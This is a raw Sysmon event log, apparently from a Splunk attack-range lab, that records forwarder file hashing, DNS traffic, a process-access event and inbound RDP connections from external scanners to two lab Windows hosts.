14:52:43.520{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:43.520{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:43.192{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88F430739FA5C73ED5D021D5D0059F26,SHA256=B302CD9D145B4F5D931846CC66A529FD8EF8A38DC6C41661BB0A3A830AF9039C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049032Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:43.339{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05833DD36648A056951ED2B4CC7150BA,SHA256=E07BF5F9E6AA9ED2ED7C0D0A922C0C8EC26CF6BF64DA6422EE235442AB30DC92,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049039Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:42.590{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58044-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049038Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:42.247{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55095-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049037Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:44.402{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53C2837C7BEDB364992266718DE3C1EB,SHA256=D79739352744AE163EDA0C6F05D9551A5E20953F740CDC16BF0C21AF66569C04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:44.489{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE21D260841A6E5C18446B3FACA61E6D,SHA256=AEC536BD65ECFA987B6BA2940B2A0A36819AC4F23893AC7D65F696E5FBCE9097,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:43.121{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51351-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:44.254{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E84AE1242E5A059BB0FF6F74B226108,SHA256=C4E0E3C6EBB790D0E2053EC410B28E222DEAA92BBE6BC31A135D0EF38FF8654E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049036Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:44.371{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD6337CF9A82652EBFFEA63696DD04AF,SHA256=8FD93D349F69E690EEFC9851C081C4533794E1940044DA630FDDE583FD21B689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:45.864{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20803AF46FD6C158A4295E38BC88B92B,SHA256=4C92793CD64292C1F61C1AEE2521379F8034026076541ADB2C911AAE00D63493,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:44.020{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-6301-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:43.249{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57430-false10.0.1.12-8000- 23542300x800000000000000062728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:45.270{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F746D325BA426DEC01125EF314A74F,SHA256=A9C9387B0DE4DD5B1C380AD79B8B0BD9CA9B37A46261213F9DBE0C0CF5F0F16C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049041Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:45.668{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED0FB85CBF1E1ADB74540720CFE5D2EC,SHA256=F3BDA0B5CEA91CF3ED493C33BBD52D4BE07890FE66AF97C971332479723974C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049040Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:45.418{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4C40195B0385BB7C422B283C486051D,SHA256=8ADDB545FC8A9CE7DCDC0ED1CDAD7ABBAE08222109483BEEF194B634C77AB4DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:46.317{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A87C34E47FB21913B9C1242AB098983,SHA256=7521466EB18A35C2FFA62F8C2DA50914412800C6549C20E9A27855E6B3428846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049043Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:46.438{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F8D78562E08A13A2DCF80C3164C63E,SHA256=665B7B78A6EDAAB0949E6C1AD308A69242F3CF497EC5820531743343BCA2CD1B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049042Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:44.153{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59519-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:47.551{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E3A5C884036A4BFC23A08100851EF23,SHA256=8806B14E4A4F6C77CE11C64D97A0C07F41C114454D1A36B15E8A70C33369B840,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049045Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:47.438{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90CF574A83ABA9BE8B123FB23DC03750,SHA256=F8DABE2FD1613CAE117F604D673565335F6F88A45E08AADE3DE460094C330BE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:45.936{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60923-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:45.566{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-339.attackrange.local53domainfalse10.0.1.14win-dc-339.attackrange.local65535- 354300x800000000000000062734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:45.566{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-339.attackrange.local53domainfalse10.0.1.14win-dc-339.attackrange.local58172- 354300x800000000000000062733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:45.565{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local56757- 23542300x800000000000000049044Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:47.423{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=576EF37A52D2F4A8F59F9A6D7F119AC8,SHA256=268A382D8463E5D093F857C2B4B417C4758800737504A51CA6977936F7A31EDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:48.583{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=255DB3D8684D50DFDC04BFE9602F90A8,SHA256=397E5B85DF14B79F907F92FB57AAE7B2AD6A0E4B82499AB24EED073D772CE9BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049046Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:48.454{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CAF69B216CC05D7554348DB764ED2E6,SHA256=AB0F2256C46FD515A46ECA7640635A53E7AA5D05BB802D88FB381506F5FDBEE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:46.980{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-9035-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:48.489{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8D03168725C4615C95869F2A84584BA,SHA256=553C79D6B4253A4D79C06A41684C74DC81B96A63F952042A8AC0F8E8D9212EE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:49.598{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0EDCDCA015EEABDE9BF85C1009B7469,SHA256=5902A2E8403C28F34B82A8C4E3AEB511F185C189C5ACEA8EA60686D7BDDEE9D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049050Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:49.844{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC6F2867B9E15D6084569026CD1838EA,SHA256=E0F0274FBD231646A642E8A2D9A71062BD1F2E4E1F6D080E09EB5CFAE8FD843D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049049Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:49.454{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F444420588FE8FE0625711CB52454D4B,SHA256=080A1D9ACEAAF8A805BA62BF9BDC9DF2031E9DFCE129277061E6DFE163E6D3D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:47.443{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56784-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049048Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:46.798{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52463-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049047Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:46.660{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53621-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049052Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:50.485{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3CCDED44CCDD98F8820E8BF90305CE7,SHA256=EA694B1128D04F5B716B3A877B6C460CE01B3B6DF521C2124C1A711995AF2511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:50.645{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A2A2034574C91C0C43B7930595ADE0,SHA256=C5426CDBFD7882BCA22EA64FD0409385E0EEA6E842C5629EE3D89F42E57644E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:49.281{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57431-false10.0.1.12-8000- 354300x800000000000000062743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:48.550{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-7668-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049051Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:47.248{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62456-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049056Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:51.516{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ECC558857109B75D025FD6C4C7EED8A,SHA256=1003E8DEAA73D3B57007F0CBE9F657C871403BFA561E283635637467DF7FF986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:51.661{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B11B418F5BAB60D07C071E42B6E4241E,SHA256=2A4F6B67AB4DFEBA81FDC28499DDC6172C3DC21959E616811497FABA052BDEF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049055Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:48.700{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62749-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049054Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:48.668{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60988-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049053Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:51.079{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD8154AADE062D84F553B762DBFA6C33,SHA256=51947EF056B8671B509C2FD6CBA6C31E0341A33865F715706B3C96DF81E93B9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:50.206{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-3564-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:50.138{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-11772-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:52.692{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CEE9BA8434A080D6A639ED42DDEFB4A,SHA256=57F2F94E8C2A97B0129A3531B59AFC653CDED6CE8AEE982CC6E9EABA249C72E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:52.676{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F6B88A282FF917755A072FA041B608,SHA256=0EA606761E28570816C8FBCF1C439B3DBAF295729A870DE4597703B7383D4514,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049057Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:52.516{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8946D96529CC90371012C26B3DB486F5,SHA256=DEEAC2579FC53324B9BAD448953813BF523BBE9AE4BF234909BA7B3459925024,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:53.770{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=49C3410FE97077286E34CAC07B8A1285,SHA256=0B9EB5AA801F3FFD593D17C56FDAC20ED9A39F7D771AC1291EC5D507DC7DD779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:53.739{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBA6CD8F81C72DE8580ECDF84111E222,SHA256=D6EE6F0D40FD4297A4283E57486BDC602A1FB4638D890E8AAF4E9A1C698CF0FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:51.619{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64004-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:51.590{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4932-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:51.555{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-13137-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049061Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:53.532{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF12473F39A8F2D354B237C35A2F29A9,SHA256=217385F62CA7EEB9C248999402E1BFA203ED976B1BC12C20CBFE7A371AF7AECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049060Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:53.469{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7D6D4F89ED544CD5DBED2BA56F45A40,SHA256=C33CFEF40EDAB0AD49B8CBB23550F7E7444AFC2AED093473E485C3D1196D859C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049059Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:50.612{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62524-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 